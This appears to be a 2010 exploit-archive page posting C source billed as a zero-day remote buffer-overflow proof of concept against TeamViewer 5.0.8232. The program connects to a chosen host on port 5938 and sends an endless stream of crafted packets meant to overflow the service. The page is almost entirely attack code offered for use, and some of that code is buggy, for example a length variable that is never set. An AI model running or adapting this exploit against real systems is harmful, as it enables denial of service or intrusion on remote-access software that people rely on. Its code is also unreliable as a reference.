TeamViewer 5.0.8232 Remote BOF PoC (0day)
Posted on 18 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>TeamViewer 5.0.8232 Remote BOF PoC (0day)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================= TeamViewer 5.0.8232 Remote BOF PoC (0day) ========================================= #include<stdio.h> #include<sys/types.h> #include<sys/socket.h> #include<netinet/in.h> #include<unistd.h> #define ALOC(tip,n) (tip*)malloc(sizeof(tip)*n) #define POCNAME "[*]TeamViewer 5.0.8232 remote BOF poc(0day)" #define AUTHOR "[*]fl0 fl0w" typedef int i32; typedef char i8; typedef short i16; enum { True=1, False=0, Error=-1 }; struct linger ling = {1,1}; i8* host; i16 port; i32 ver1,ver2,slen; void syntax(){ i8 *help[]={" -h hostname", " -p port(default 5938)", }; i32 i; size_t com=sizeof help / sizeof help[0]; for(i=0;i<com;i++){ printf("%s ",help[i]); } } i32 arguments(i32 argc,i8** argv){ i32 i; argc--; for(i=1;i<argc;i++){ switch(argv[i][1]){ case'h': host=argv[++i]; break; case'p': port=atoi(argv[++i]); break; default:{ printf("error with argument nr %d:(%s) ",i,argv[i]); return Error; exit(0); } } } } i32 main(i32 argc,i8** argv){ if(argc<2){ printf("%s %s ",POCNAME,AUTHOR); printf(" Too few arguments syntax is: "); syntax(); exit(0); } arguments(argc,argv); i32 sok,i, svcon, sokaddr; i8 *sendbytes=ALOC(i8,32768), *recevbytes=ALOC(i8,5548); printf("[*]Starting ... "); struct sockaddr_in sockaddr_sok; sokaddr = sizeof(sockaddr_sok); sockaddr_sok.sin_family = AF_INET; sockaddr_sok.sin_addr.s_addr = inet_addr(host); sockaddr_sok.sin_port = htons(port); sok=socket(AF_INET,SOCK_STREAM,0); if(sok==-1){ printf("[*]FAILED SOCKET "); exit(0); } if(svcon=connect(sok,(struct sockaddr*)&sockaddr_sok,sokaddr)<0){ printf("Error with connection "); shutdown(sok,1); exit(0); } if(setsockopt(sok, SOL_SOCKET, SO_LINGER, (i8*)&ling, sizeof(ling))<0){ printf("Error setting the socket "); shutdown(sok,1); exit(0); } if(recv(sok,&ver1,1,0)!=1) exit(0); if(recv(sok, &ver2,1,0)!=1) exit(0); memset(sendbytes,0,250); recv(sok,recevbytes,sizeof(recevbytes),0); for(i=0;;i++) { if(!(i & 15)) printf("%d ", i); sendbytes[0] = ver1; sendbytes[1] = ver2; sendbytes[2] = (i & 1) ? 15 : 21; *(i16 *)(sendbytes + 3) = slen; if(send(sok, sendbytes, 5, 0) != 5) break; if(slen) { memset(sendbytes, i, slen); if(send(sok, sendbytes, slen, 0) != slen) break; } } shutdown(sok,1); return 0; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-18]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
